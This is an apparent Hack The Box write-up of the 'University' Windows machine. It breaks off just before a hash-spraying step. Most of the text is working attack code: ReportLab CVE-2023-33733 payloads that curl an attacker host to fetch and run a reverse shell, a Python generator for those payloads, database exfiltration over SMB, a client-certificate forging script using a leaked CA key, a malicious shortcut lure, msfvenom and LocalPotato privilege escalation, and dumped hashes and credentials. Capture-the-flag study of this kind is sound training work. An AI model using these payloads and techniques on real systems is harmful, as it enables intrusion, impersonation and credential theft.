Hack The Box / WINDOWS / 2024-11-02
Hack The Box — University (Windows)
RCE via ReportLab/CVE-2023-33733, pivot through internal lab with Ligolo, compromise WS-3, credential/hash reuse across domain users, then DCSync to Domain Admin.
Target
- IP: 10.10.11.39
Recon
sudo nmap -sC -sV 10.10.11.39 -p- -T5 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http nginx 1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://university.htb/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-30 03:26:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: university.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
60412/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-10-30T03:27:12
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h00m00s
Add university.htb to /etc/hosts.
Register and log in as a student.
A student can export their profile as a PDF, and the generated file identifies ReportLab (a Python PDF library) as its producer, so the backend is Python (the manage.py and django_* tables found later confirm it is Django).
ReportLab before 3.6.13 is affected by CVE-2023-33733: the rl_safe_eval sandbox that evaluates expressions in markup attributes such as <font color="..."> can be escaped to reach os.system, so any user-controlled text that ends up in the PDF is a remote code execution sink. Public exploit:
- https://github.com/c53elyas/CVE-2023-33733
Initial RCE via ReportLab Injection
Edit the profile, intercept the update request in Burp and send it to Repeater. The bio field is rendered into the PDF as ReportLab markup, so set bio to the following payload (it fetches a URL from our host as proof of execution):
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('curl http://10.10.14.33/test') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>
URL-encode the payload (Burp does this), start an HTTP server on the attacker host and send the request. Then export the profile to PDF: rendering the PDF evaluates the color expression and a GET /test arrives at our server, confirming command execution.
Next, a reverse shell. A Python reverse-shell script is attached as attachments/rev.py; serve it from the attacker host:
python3 -m http.server 80
Use payload:
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('curl http://10.10.14.33/rev.py -o rev.py') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>
URL-encode, send, and export the PDF again; rev.py is downloaded into the web root (C:\Web\University, the working directory of the Django process).
Start netcat listener:
rlwrap nc -vlnp 4444
Use payload:
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('python rev.py') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>
Send the request and export the PDF once more. The listener receives a reverse shell as the account the web application runs under:
whoami
university\wao
dir
Volume in drive C has no label.
Volume Serial Number is 8E7E-469B
Directory of C:\Web\University
10/29/2024 09:46 PM <DIR> .
10/29/2024 09:46 PM <DIR> ..
02/15/2024 09:13 AM <DIR> CA
10/29/2024 09:46 PM 245,760 db.sqlite3
12/03/2023 05:28 AM 666 manage.py
10/29/2024 09:31 PM 1,351 rev.bat
10/29/2024 09:46 PM 698 rev.py
10/29/2024 09:46 PM 5,357 S1Q931.html
10/29/2024 09:46 PM 0 S1Q931.pdf
02/15/2024 01:51 AM 133 start-server.bat
02/19/2024 04:54 PM <DIR> static
10/15/2024 11:42 AM <DIR> University
7 File(s) 253,965 bytes
5 Dir(s) 10,052,907,008 bytes free
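The three payloads above differ only in the command inside system('...'). The following Python, an added example that is not code from the write-up or from the exploit repository, templates that expression so the command can be swapped without hand-editing it, refuses commands that would break the quoting, and produces the URL-encoded form body that was built in Burp by hand. The field name bio is the one the walkthrough used; the remaining fields of the profile form are not known from the page and must be appended by the caller.

```python
"""Parameterise the CVE-2023-33733 payload used above (added example)."""
from urllib.parse import urlencode

# How the escape works (as described by the public exploit): rl_safe_eval
# blocks attribute names that start with "__" by calling name.startswith()
# and comparing the name against a blocklist. The expression builds a str
# subclass ("Word") whose startswith() always returns False and whose __eq__
# is stateful, so the sandbox's name checks pass while getattr() later sees
# the real string "__globals__". pow here is the sandbox's own Python-level
# wrapper, whose __globals__ include the module's os import.
# The trailing `and 'red'` keeps the result a valid colour so PDF generation
# does not abort before os.system() has run.
_TEMPLATE = (
    "<para><font color=\"[[[getattr(pow, Word('__globals__'))['os']"
    ".system('{cmd}') for Word in [ orgTypeFun( 'Word', (str,), "
    "{{ 'mutated': 1, 'startswith': lambda self, x: 1 == 0, "
    "'__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, "
    "'mutate': lambda self: {{ setattr(self, 'mutated', self.mutated - 1) }}, "
    "'__hash__': lambda self: hash(str(self)), }}, ) ] ] "
    "for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'\">"
    "\nexploit\n</font></para>"
)


def build_payload(cmd: str) -> str:
    """Markup for `cmd`. The command sits inside single quotes within a
    double-quoted attribute, so either quote character would break the
    expression; refuse those rather than emit a payload that fails silently."""
    if "'" in cmd or '"' in cmd:
        raise ValueError("command must not contain quote characters")
    return _TEMPLATE.format(cmd=cmd)


def form_body(cmd: str, field: str = "bio") -> str:
    """x-www-form-urlencoded fragment for the profile-update request.
    `bio` is the field the walkthrough used (assumption: the other form
    fields are appended by the caller)."""
    return urlencode({field: build_payload(cmd)})


if __name__ == "__main__":
    # 10.10.14.33 is the attacker address used in the walkthrough
    print(form_body("curl http://10.10.14.33/test"))
```

Commands that need quoting (a PowerShell one-liner, for instance) should be dropped into a file first, exactly as the walkthrough does with rev.py, and then run by name.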
Looting db.sqlite3
Exfiltrate db.sqlite3 over SMB to the attacker host.
On attacker machine:
impacket-smbserver -smb2support -username test12 -password test12 share $(pwd)
On victim machine:
net use \\10.10.14.33\share test12 /USER:test12
copy db.sqlite3 \\10.10.14.33\share
sqlite3 db.sqlite3
select * from University_professor;
2|2|static/assets/uploads/Pub_KEYs/2.asc
3|4|static/assets/uploads/Pub_KEYs/3.asc
4|3|static/assets/uploads/Pub_KEYs/4.asc
5|8|static/assets/uploads/Pub_KEYs/5.asc
6|6|static/assets/uploads/Pub_KEYs/6.asc
.tables
University_course auth_group
University_course_students auth_group_permissions
University_customuser auth_permission
University_department django_admin_log
University_lecture django_content_type
University_professor django_migrations
University_student django_session
University_student_courses
PRAGMA table_info('University_customuser');
0|id|INTEGER|1||1
1|password|varchar(128)|1||0
2|last_login|datetime|0||0
3|username|varchar(30)|1||0
4|first_name|varchar(30)|1||0
5|last_name|varchar(30)|1||0
6|bio|TEXT|1||0
7|csr|varchar(100)|0||0
8|is_active|bool|1||0
9|is_staff|bool|1||0
10|is_superuser|bool|1||0
11|failed_login_attempts|INTEGER|1||0
12|address|varchar(50)|1||0
13|joined_at|datetime|1||0
14|image|varchar(100)|1||0
15|user_type|varchar(10)|1||0
16|email|varchar(50)|1||0
select * from University_customuser;
2|pbkdf2_sha256$600000$igb7CzR3ivxQT4urvx0lWw$dAfkiIa438POS8K8s2dRNLy2BKZv7jxDnVuXqbZ61+s=|2024-10-31 20:51:43.058311|george|george|lantern|||1|0|0|0|Canada West - Vancouver|2024-02-19 23:23:16.293609|static/assets/images/users_profiles/2.png|Professor|george@university.htb
3|pbkdf2_sha256$600000$i8XRGybY2ASqA3kEuTW4XH$SwK7A52nA1KOnuniKifqWzrjiIyOnrZu7sf+Zvq44qc=|2024-02-20 01:06:28.437570|carol|Carol|Helgen|||1|0|0|0|USA - Washington|2024-02-19 23:25:14.919010|static/assets/images/users_profiles/3.jpg|Professor|carol@science.com
4|pbkdf2_sha256$600000$Bg8pRHaZsbGpLwirrZPvvn$7CtXYJhBDrGhiCvjma7X/AOKRWZS2SP0H6PAXvT96Vw=|2024-02-20 00:59:29.687668|Nour|Nour|Qasso|||1|0|0|0|Germany - Frankfurt|2024-02-19 23:27:04.700197|static/assets/images/users_profiles/4.jpg|Professor|nour.qasso@gmail.com
5|pbkdf2_sha256$600000$VzP8VVjEQgQw6HvYAftmCl$s9k3UC/e2++hhQDF2KzhunOaAqxbi4rugRb42dC6qr0=|2024-02-20 00:37:55.455163|martin.rose|Martin|Rose|||1|0|0|0|US West - Los Angeles|2024-02-19 23:28:49.293710|static/assets/images/users_profiles/5.jpg|Professor|martin.rose@hotmail.com
6|pbkdf2_sha256$600000$1s48WhgRDulQ6FsNgnXjot$SZ4piS9Ryf4mgIj0prEjN+F0pGEDtNti3b9WaQfAeTk=|2024-09-16 12:43:05.500724|nya|Nya|Laracrof||static/assets/uploads/CSRs/6_mnY36oU.csr|1|0|0|0|UK - London|2024-02-19 23:31:30.168489|static/assets/images/users_profiles/6.jpg|Professor|nya.laracrof@skype.com
7|pbkdf2_sha256$600000$70XtdR4HrHHignt7EHiOpT$RP9/4PKHmbtCBq0FOPqyppQKjXntM89vc7jGyjk/zAk=|2024-02-26 01:42:16.677697|Steven.U|Steven|Universe|<h3>The First student in this university!</h3>|static/assets/uploads/CSRs/7.csr|1|0|0|0|Italy - Milan|2024-02-25 23:08:44.508623|static/assets/images/users_profiles/7.jpeg|Student|steven@yahoo.com
select * from django_session;
k7qe8j4r1sis6pjnhjcogytrjyn59wec|.eJxVjEsOAiEQBe_C2pDmK7h07xlIQ4OMGkiGmZXx7oZkFrp9VfXeLOC-1bCPvIaF2IUJdvrdIqZnbhPQA9u989Tbti6RT4UfdPBbp_y6Hu7fQcVRZ22L1QIoARkjwJLKJXtrwGifsikgrUcqToJSWAooqyU5rQR44aI5s88X1oA3EA:1rcCr1:WSvLnR07E_WB8NdLOoIShUtZMw1wmdJHtLDf3jdn0nY|2024-03-04 23:15:19.590652
1wywr0zvuxonv7ttj6n6u41upap8bahe|.eJxVjMsKwjAQAP8lZwl5kN3Wo3e_oWyyWVOVBPo4Ff9dAj3odWaYQ020b2Xa17xMM6urAnX5ZZHSK9cu-En10XRqdVvmqHuiT7vqe-P8vp3t36DQWvpW2FtMZIEDAPhoMqIMXkhGE3EIjrwLnAwh-uyAMRnJdoREYplEfb7nSjhq:1rcDGM:eG2X2aAvYCdEC1do3hLYWeUYn46Ixm89t2FYTmNdqRE|2024-03-04 23:41:30.388340
hco45en49uem72ij8x53bh8yd8l8l2oa|.eJxVjMsKwjAQAP8lZwl5kN3Wo3e_oWyyWVOVBPo4Ff9dAj3odWaYQ020b2Xa17xMM6urAnX5ZZHSK9cu-En10XRqdVvmqHuiT7vqe-P8vp3t36DQWvpW2FtMZIEDAPhoMqIMXkhGE3EIjrwLnAwh-uyAMRnJdoREYplEfb7nSjhq:1rcDeC:ZeHMHkYGcH2MaHSZuoqM3JG5dVzaN95xXB4D8dJ1LfM|2024-03-05 00:06:08.434309
vu9by27zqd0rt4s801bucti8ids22xz8|.eJxVjEEOwiAQRe_C2hCkMA4u3fcMZAZGqRpISrsy3l2bdKHb_977LxVpXUpcu8xxyuqsrDr8bkzpIXUD-U711nRqdZkn1puid9r12LI8L7v7d1Col28tR5JM2Tkrg5GAwaK9EoDBRODMgCwAjMLo8JSEmTwCZkeekwcf1PsD9rs4Rw:1rcEk5:yMN-i9OuJgFYGX_hyY9upanrhfnNd_3CkOpoUVopRP8|2024-03-05 01:16:17.078808
iatduf8366zvqc4mrcej5vp17ujuv6lh|.eJxVjEsOAiEQBe_C2pDmK7h07xlIQ4OMGkiGmZXx7oZkFrp9VfXeLOC-1bCPvIaF2IUJdvrdIqZnbhPQA9u989Tbti6RT4UfdPBbp_y6Hu7fQcVRZ22L1QIoARkjwJLKJXtrwGifsikgrUcqToJSWAooqyU5rQR44aI5s88X1oA3EA:1rgkqW:d8KjE9H3GFZydKe-KXC4UAKu045HCPOiqISbwHxwoBE|2024-03-17 12:21:36.726575
y4v1sxx98hbomv267ya87s94q4223pl2|.eJxVjMsOwiAUBf-FtSGFUh4u3fsNhPtAqgaS0q6M_65NutDtmZnzEjFta4lb5yXOJM7CitPvBgkfXHdA91RvTWKr6zKD3BV50C6vjfh5Ody_g5J6-dYYhqxDQvQ0BtBomY0Z0qi0GRknFXJgJAU0gePMBNk6o7yDzD5oQvH-AAtJOTY:1sqB4L:rJx2Sz3YksklLaQBo3QYlF-Eq_Eji4imT5QIDy6EdOM|2024-09-30 12:43:05.531763
bd9yx0m6pu79gkfi9574pum5l8xq93l4|.eJxVjMsOwiAQRf-FtSHlDS7d-w1kYAapGkhKuzL-uzbpQrf3nHNfLMK21rgNWuKM7MwCO_1uCfKD2g7wDu3Wee5tXebEd4UfdPBrR3peDvfvoMKo35qSKLJYOSEaQG8kyiycymDQkjI6Ze1kRgxSIQWhSFgPfvJWUyngEnt_AAKROJc:1t5zX5:0lmySyXCOxeLJlJ1nyPvZC2BAselzBmMrpcgK4EdExE|2024-11-13 03:38:07.101723
Backup Script Password Reuse
cd C:\Web\DB Backups
type db-backup-automator.ps1
$sourcePath = "C:\Web\University\db.sqlite3"
$destinationPath = "C:\Web\DB Backups\"
$7zExePath = "C:\Program Files\7-Zip\7z.exe"
$zipFileName = "DB-Backup-$(Get-Date -Format 'yyyy-MM-dd').zip"
$zipFilePath = Join-Path -Path $destinationPath -ChildPath $zipFileName
$7zCommand = "& `"$7zExePath`" a `"$zipFilePath`" `"$sourcePath`" -p'WebAO1337'"
Invoke-Expression -Command $7zCommand
The backup script hard-codes the 7-Zip archive password WebAO1337. Check whether it is also the domain password of wao, the account the web app runs as:
nxc smb university.htb -u wao -p 'WebAO1337' --shares
SMB 10.129.125.154 445 DC [+] university.htb\wao:WebAO1337
SMB 10.129.125.154 445 DC [*] Enumerated shares
SMB 10.129.125.154 445 DC Share Permissions Remark
SMB 10.129.125.154 445 DC ----- ----------- ------
SMB 10.129.125.154 445 DC ADMIN$ Remote Admin
SMB 10.129.125.154 445 DC C$ Default share
SMB 10.129.125.154 445 DC IPC$ READ Remote IPC
SMB 10.129.125.154 445 DC Lectures Lectures Share folder for Content Evalutors for reviewing submitted lectures
SMB 10.129.125.154 445 DC NETLOGON READ Logon server share
SMB 10.129.125.154 445 DC SYSVOL READ Logon server share
evil-winrm -i university.htb -u 'wao' -p 'WebAO1337'
Download and upload PowerView:
- https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
. .\PowerView.ps1
Get-DomainComputer
Among the computer objects is the domain controller itself, DC.
Add dc.university.htb to /etc/hosts.
bloodhound-python -u 'wao' -p 'WebAO1337' -ns 10.10.11.39 -d 'university.htb' -dc 'dc.university.htb' -c All
Alternative: upload SharpHound on target, execute, copy resulting zip.
ldapdomaindump university.htb -u 'university.htb\wao' -p 'WebAO1337'
In domain_computers.json three entries stand out:
- GMSA-PClient01 (GMSA01.university.htb): GMSA for Prometheus client related to Prometheus server (prometheus.university.htb)
- WS-3 (WS-3.university.htb): IP 192.168.99.2
- LAB-2 (pc-linux-gnu): IP 192.168.99.12
WS-3 and LAB-2 sit on an internal 192.168.99.0/24 network that the attacker host cannot reach directly, so we pivot through the DC.
Pivoting with Ligolo
Download Ligolo:
- https://github.com/nicocha30/ligolo-ng
On attacker machine:
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
On victim machine:
.\agent.exe -connect 10.10.16.19:11601 -ignore-cert
Proxy session is established. In ligolo:
ligolo-ng » session
# choose session 1
ligolo-ng » start
Then on attacker:
sudo ip route add 192.168.99.0/24 dev ligolo
Now we can contact WS-3.
ping 192.168.99.2
sudo nmap -sC -sV 192.168.99.2 -p- -T5 -v
PORT STATE SERVICE VERSION
135/tcp open tcpwrapped
139/tcp open tcpwrapped
445/tcp open tcpwrapped
Host script results:
| smb2-time:
| date: 2024-10-31T18:22:09
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| nbstat: NetBIOS name: WS-3, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:05:80:00 (Microsoft)
| Names:
| WS-3<20> Flags: <unique><active>
| WS-3<00> Flags: <unique><active>
|_ UNIVERSITY<00> Flags: <group><active>
|_clock-skew: 6h59m59s
The scan through the tunnel only reports 135/139/445 (all tcpwrapped), but WinRM on 5985 is reachable as well, and wao's password is valid on WS-3:
evil-winrm -i 192.168.99.2 -u 'wao' -p 'WebAO1337'
We can also reach LAB-2.
ping 192.168.99.12
sudo nmap -sC -sV 192.168.99.12 -p- -T5 -v
Port 22 is open.
ssh wao@192.168.99.12
--------------------------[!]WARNING[!]-----------------------------
|This LAB is created for web app features testing purposes ONLY....|
|Please DO NOT leave any critical information while this machine is|
| accessible by all the "Web Developers" as sudo users |
--------------------------------------------------------------------
Authenticate with wao's password WebAO1337, the one from the backup script.
ls -l /home
drwxr-xr-x 4 emma emma 4096 Sep 14 03:46 emma
drwxr-xr-x 2 steven steven 4096 Sep 14 03:47 steven
drwxr-xr-x 9 wao wao 4096 Oct 21 17:09 wao
sudo -l
Enter wao's password again.
Matching Defaults entries for wao on LAB-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wao may run the following commands on LAB-2:
(ALL : ALL) ALL
sudo -i
We are root.
cat /etc/shadow
root:$6$n5REEVlM$nYgdHK6CtQp3vbyZw2.lMaeUANVM75JmlRncD6qnObUetFP8SG2cc8XW/1enA1oUxXS39H17Cz8./En8sNQNe.:19979:0:99999:7:::
wao:$6$ZENNwHYt$DhiPYWPPBP/2sxfUusrx/5x6.8b5qI4gdJde9NDbV.8kTtxTdxvEW5rb5wG9qudc82aX01AOILA2iNoZYEilE/:19982:0:99999:7:::
steven:$6$W14mH6Yy$.qJ3F3FwQ5oVgBiYdCLBSQn8v.SbJ3MDEoTZ/0OhpamOhUKH/hgTZOyuoxcZpwiGtqLYy5PTz1zL6GY7vWGF8/:19979:0:99999:7:::
emma:$6$2gWMCP4b$pzjWdquZSg80UdO2RylTycDchjgdlznxGHhGdKafgyaUgjVVLwsgjbirtNkIzvDCBk5ixquxiba0IFwX6bsa9.:19980:0:99999:7:::
Put the emma and steven lines in a file named hash (sha512crypt, hashcat mode 1800):
hashcat -m 1800 -a 0 ./hash ./rockyou.txt
Neither cracks with rockyou.
Certificate Abuse in University App
cd /home/wao/Downloads/CA
Download rootCA.crt, rootCA.key and rootCA.srl. The web app supports login by client certificate, and the CA's private key was left on the lab machine, so we can mint a certificate for any user. Generate a fresh key pair and CSR (do not use rootCA.key as the -keyout target, which would overwrite the CA key needed for signing):
openssl req -newkey rsa:2048 -nodes -keyout martin.key -out My-CSR.csr
When prompted, set Common Name to martin.rose and Email Address to martin.rose@hotmail.com (the professor's values from University_customuser).
openssl x509 -req -in My-CSR.csr -CA rootCA.crt -CAkey rootCA.key -CAcreateserial -days 365 -out martin_rose.crt
Go to university.htb, choose login with certificate and submit martin_rose.crt.
We are logged in as martin.rose (Professor): the application trusts whatever identity the CA signed, and the CA key is ours.
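The same forgery in Python, as an added example that is not part of the write-up: it reproduces the two openssl steps with the cryptography package (assumed installed) and adds the check that catches the classic mistake of signing with the wrong key. The real rootCA.key and rootCA.crt cannot be shipped here, so make_ca() constructs a stand-in root; against the target, load the downloaded files with serialization.load_pem_private_key() and x509.load_pem_x509_certificate() instead.

```python
"""Mint a client certificate for any user with a leaked CA key (added example)."""
import datetime

from cryptography import x509
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.x509.oid import NameOID


def _now():
    return datetime.datetime.now(datetime.timezone.utc)


def make_ca():
    """Constructed stand-in for rootCA.key / rootCA.crt (assumption: the
    real root is an RSA CA with BasicConstraints CA:TRUE)."""
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "stand-in root CA")])
    cert = (
        x509.CertificateBuilder()
        .subject_name(name)
        .issuer_name(name)
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(_now() - datetime.timedelta(days=1))
        .not_valid_after(_now() + datetime.timedelta(days=3650))
        .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
        .sign(key, hashes.SHA256())
    )
    return key, cert


def forge_client_cert(ca_key, ca_cert, common_name, email, days=365):
    """`openssl req -newkey ...` followed by `openssl x509 -req -CA -CAkey`:
    a fresh key pair for the impersonated user, a CSR carrying the CN and
    e-mail the application matches on, and a certificate signed by the CA."""
    user_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    subject = x509.Name([
        x509.NameAttribute(NameOID.COMMON_NAME, common_name),
        x509.NameAttribute(NameOID.EMAIL_ADDRESS, email),
    ])
    csr = x509.CertificateSigningRequestBuilder().subject_name(subject).sign(user_key, hashes.SHA256())
    cert = (
        x509.CertificateBuilder()
        .subject_name(csr.subject)
        .issuer_name(ca_cert.subject)
        .public_key(csr.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(_now() - datetime.timedelta(minutes=5))
        .not_valid_after(_now() + datetime.timedelta(days=days))
        .sign(ca_key, hashes.SHA256())
    )
    return user_key, cert


def chains_to(cert, ca_cert) -> bool:
    """What `openssl verify -CAfile rootCA.crt martin_rose.crt` checks: the
    certificate's signature validates under the CA public key. A certificate
    produced after accidentally overwriting rootCA.key fails here."""
    try:
        ca_cert.public_key().verify(
            cert.signature, cert.tbs_certificate_bytes,
            padding.PKCS1v15(), cert.signature_hash_algorithm,
        )
        return True
    except InvalidSignature:
        return False


def subject_fields(cert):
    """(CN, e-mail) as the application would read them from the subject."""
    cn = cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)[0].value
    mail = cert.subject.get_attributes_for_oid(NameOID.EMAIL_ADDRESS)[0].value
    return cn, mail


def to_pem(cert) -> bytes:
    return cert.public_bytes(serialization.Encoding.PEM)


if __name__ == "__main__":
    ca_key, ca_cert = make_ca()
    _, cert = forge_client_cert(ca_key, ca_cert, "martin.rose", "martin.rose@hotmail.com")
    assert chains_to(cert, ca_cert)
    with open("martin_rose.crt", "wb") as f:
        f.write(to_pem(cert))
```

Run chains_to() (or openssl verify) before uploading: a certificate that does not validate against rootCA.crt tells you the signing key was wrong before the application's error message does.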
gpg --quick-generate-key martin.rose
gpg --output public.pgp --armor --export martin.rose
Upload public GPG key in site page "Change public key". Create a new course and click add a new lecture.
The form offers a sample lecture zip; download and unzip it to see the expected package layout. Among the files is a Windows Internet Shortcut, Reference-1.url. The Lectures share remark says submissions are opened by content evaluators on their workstations, so a shortcut pointing at a local executable is the lure. Replace its content with:
[InternetShortcut]
URL=file://C:/temp/reverse.exe
Compromise WS-3 as Martin.T
Get shell on WS-3:
evil-winrm -i 192.168.99.2 -u 'wao' -p 'WebAO1337'
cd \
mkdir temp
Now reverse.exe has to be placed at C:\temp on WS-3. Problem: WS-3 has no route to the attacker host, so a direct download fails. For example:
curl http://10.10.16.37/test
fails.
Ligolo listeners solve this. In the Ligolo proxy console, bind a port on the agent host (the DC, 192.168.99.1 on the internal network) and forward it to the attacker's local web server:
listener_add --addr 0.0.0.0:5555 --to 127.0.0.1:80 --tcp
Then in WS-3 shell:
curl http://192.168.99.1:5555/test
works (callback reaches local Python server).
Generate payload:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.99.1 LPORT=7777 -f exe -o reverse.exe
Note: LHOST is 192.168.99.1, the DC's internal-network address where the Ligolo agent listens, not the attacker host; the agent forwards the callback through the tunnel.
Upload to C:\temp on WS-3:
curl http://192.168.99.1:5555/reverse.exe -o reverse.exe
Start Metasploit:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
run
Add a second Ligolo listener that forwards the callback port on the agent to the Metasploit handler (10.10.16.37 is the attacker's tun0 address; the handler listens on the default port 4444):
listener_add --addr 0.0.0.0:7777 --to 10.10.16.37:4444 --tcp
Now build and sign the lecture package:
cd folder_with_lecture_files
zip ../lecture.zip *
cd ..
gpg -u martin.rose --detach-sign lecture.zip
(The form expects the zip plus a detached signature made with the key whose public half we uploaded; --sign alone would produce lecture.zip.gpg, which is not what is uploaded.) Upload lecture.zip and lecture.zip.sig.
The site says:
The lecture is uploaded successfully, our team will review it and contact you soon...
Shortly afterwards the Metasploit handler receives a Meterpreter session: an evaluator on WS-3 opened the shortcut.
meterpreter > getuid
Server username: UNIVERSITY\Martin.T
meterpreter > shell
Go to desktop and read note:
type README.txt
Hello Professors.
We have created this note for all the users on the domain computers: WS-1, WS-2 and WS-3.
These computers have not been updated since 10/29/2023.
Since these devices are used for content evaluation purposes, they should always have the latest security updates.
So please be sure to complete your current assessments and move on to the computers "WS-4" and "WS-5".
The security team will begin working on the updates and applying new security policies early next month.
Best regards.
Help Desk team - Rose Lanosta.
cd C:\Program Files\Automation-Scripts
dir
03/10/2024 12:13 AM <DIR> .
03/10/2024 12:13 AM <DIR> ..
10/21/2024 03:17 PM 1,278 get-lectures.ps1
09/13/2024 11:13 PM 410 wpad-cache-cleaner.ps1
2 File(s) 1,688 bytes
2 Dir(s) 10,024,706,048 bytes free
LocalPotato PrivEsc on WS-3
Download and upload LocalPotato:
- https://github.com/decoder-it/LocalPotato
curl http://192.168.99.1:5555/LocalPotato.exe -o LocalPotato.exe
Create PowerShell reverse shell payload from revshells.com toward 192.168.99.1:8888.
Save as rev.ps1 and upload to WS-3.
In the Ligolo proxy console, forward the callback port on the agent to a local netcat listener:
listener_add --addr 0.0.0.0:8888 --to 127.0.0.1:4444 --tcp
Listen locally:
rlwrap nc -vlnp 4444
On WS-3 as Martin.T, use LocalPotato (CVE-2023-21746, local NTLM authentication reflection) to write rev.ps1 over one of the automation scripts with SYSTEM's privileges; -o is a path relative to C:\. The scripts in Automation-Scripts are evidently run by a privileged account, because the overwritten one calls back as ws-3\administrator:
.\LocalPotato.exe -i "c:\temp\rev.ps1" -o "Program Files\Automation-Scripts\wpad-cache-cleaner.ps1"
In netcat terminal we obtain shell.
whoami
ws-3\administrator
Upload mimikatz:
- https://github.com/ParrotSec/mimikatz/raw/master/x64/mimikatz.exe
curl http://192.168.99.1:5555/mimikatz.exe -o mimikatz.exe
.\mimikatz.exe "lsadump::sam" exit
That fails from this shell. Run the Meterpreter payload again, now from the Administrator shell (the handler and the Ligolo listener on 7777 are still up):
C:\temp\reverse.exe
A new Meterpreter session arrives, and its built-in hashdump works:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:a8bf1bae201f988dc1ca99f1043e11dc:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:71ffc7b2d302f8059b92219e7d7a7ba1:::
We have the local Administrator NT hash, and it works for WinRM (pass-the-hash):
evil-winrm -i 192.168.99.2 -u Administrator -H 'ba76a28db8aaeb636566a414f3e104aa'
Put the hashdump lines in a file named hash (NTLM, hashcat mode 1000):
hashcat -m 1000 -a 0 ./hash ./rockyou.txt --username
Not cracked.
Hash Reuse Across Domain Users
Pass-the-hash does not need the cleartext, so check whether the same NT hash is valid for any domain account. Build a user list from domain_users.json (ldapdomaindump output):
python3 - <<'EOF'
import json
# ldapdomaindump stores each object's LDAP attributes as lists of values
with open('domain_users.json') as f:
    users = json.load(f)
names = [u['attributes']['sAMAccountName'][0] for u in users]
with open('users.txt', 'w') as f:
    f.write('\n'.join(names) + '\n')
EOF
Put the Administrator hash in a file named hashes and spray it against every user:
